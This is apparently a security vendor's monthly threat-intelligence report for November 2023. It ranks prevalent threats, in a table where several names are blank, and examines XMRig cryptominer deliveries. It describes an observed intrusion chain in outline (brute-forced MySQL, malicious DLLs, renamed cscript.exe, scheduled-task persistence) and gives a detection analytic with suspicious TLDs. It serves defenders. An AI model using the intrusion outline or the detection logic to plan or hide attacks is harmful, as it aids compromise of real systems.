Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and share a public version of it with the broader infosec community.
Highlights
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for November 2023:
| Last month's rank | Threat name | Threat description |
|---|---|---|
| Last month's rank: ⬆ 1 | Threat name: | Threat description: Collection of Python classes to construct/manipulate network protocols |
| Last month's rank: ➡ 2 | Threat name: | Threat description: Open source tool that dumps credentials using various techniques |
| Last month's rank: ⬆ 3 | Threat name: | Threat description: Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| Last month's rank: ⬇ 4 | Threat name: | Threat description: Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects |
| Last month's rank: ⬆ 5* | Threat name: | Threat description: Penetration testing tool that integrates functionality from multiple offensive security projects and has the ability to extend its functionality with a native scripting language |
| Last month's rank: ⬇ 5* | Threat name: | Threat description: Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Last month's rank: ⬇ 5* | Threat name: LummaC2 | Threat description: Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| Last month's rank: ⬆ 5* | Threat name: NetSupport Manager | Threat description: Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Last month's rank: ⬆ 9* | Threat name: | Threat description: Open source tool used to identify attack paths and relationships in Active Directory |
| Last month's rank: ⬆ 9* | Threat name: Charcoal Stork | Threat description: Suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper |
| Last month's rank: ⬇ 9* | Threat name: | Threat description: Penetration testing framework used to probe systematic vulnerabilities on networks and servers and conduct post-exploitation activity on compromised hosts |
| Last month's rank: ⬇ 9* | Threat name: | Threat description: Activity cluster using a worm spread by external drives that leverages Windows Installer to download malicious files |
| Last month's rank: ⬆ 9* | Threat name: RedLine | Threat description: Information stealer sold on underground forums and used by a variety of adversaries |
| Last month's rank: ⬆ 9* | Threat name: | Threat description: Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| Last month's rank: ⬆ 9* | Threat name: XMRig | Threat description: Monero cryptocurrency miner that is often deployed as a secondary payload |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Observations on trending threats
Our top 10 threats this month ended up being a top 16, with an atypical 7-way tie for 9th place. SocGholish was more active this month, moving up to 3rd after placing just off the list at no. 11 last month. This is the highest SocGholish has been in the top 10 since April 2023. Cobalt Strike also saw an increase in activity that landed it in a 4-way tie for the 5th spot. Major U.S. holidays are often an active time for adversaries, and we saw a jump in both attempted Cobalt Strike use and BloodHound use during the week of Thanksgiving this year.
The reindeer games are XMRigged
One of our 9th place ties is XMRig, a Monero cryptocurrency miner, making its first appearance in our top 10. We typically see a few instances of XMRig every month, and saw enough in November for it to squeak into the top 10 list. XMRig by itself is a fairly benign open source miner available on GitHub. While, like all cryptominers, it uses system resources for its mining activity, it does not contain any additional malicious code.
Sometimes deploying XMRig is the adversary’s primary goal, but frequently XMRig is deployed as a secondary payload in an attempt to monetize threat actors’ access to victim systems. In November 2023 alone, researchers reported campaigns deploying XMRig alongside other malware families like Rhadamanthys and Cobalt Strike.
Here at Red Canary we saw XMRig delivered multiple ways last month. One example was very similar to activity reported by the DFIR Report in 2022. We assess the adversary likely brute forced access to a public-facing MySQL server then uploaded malicious DLLs and a custom loadable function to execute the DLLs. The adversary wrote a number of additional files to disk, including a renamed instance of cscript.exe, the XMRig binary, and additional scripts used to install and execute XMRig. They also created a scheduled task for persistence.
Detecting XMRig depends on how it is delivered. In the above example we saw at Red Canary, unusual cscript.exe activity gives us a detection opportunity.
Detection opportunity: Windows Script Host wscript.exe or cscript.exe making network connections to a suspicious top-level domain (TLD)
The following pseudo-detection analytic identifies wscript.exe or cscript.exe making network connections to a suspicious top-level domain (TLD). Malicious scripts, like those used in the example above to install XMRig, may connect to infrastructure hosted on unusual TLDs. This is atypical behavior, although custom admin scripts may reach out to personal domains. The analytic below leverages a custom-made suspicious domain list, based on observations and research on abused TLDs shared by teams like Unit 42.
process == (wscript, cscript)
&&
has_netconn
&&
command_includes (domain strings matching *suspicious_tlds)
Note: You can create a list of suspicious TLDs to reference in *suspicious_tlds based on in-house observations and industry research. The Red Canary list includes: .date, .cf, .ga, .casa, .cyou, among others.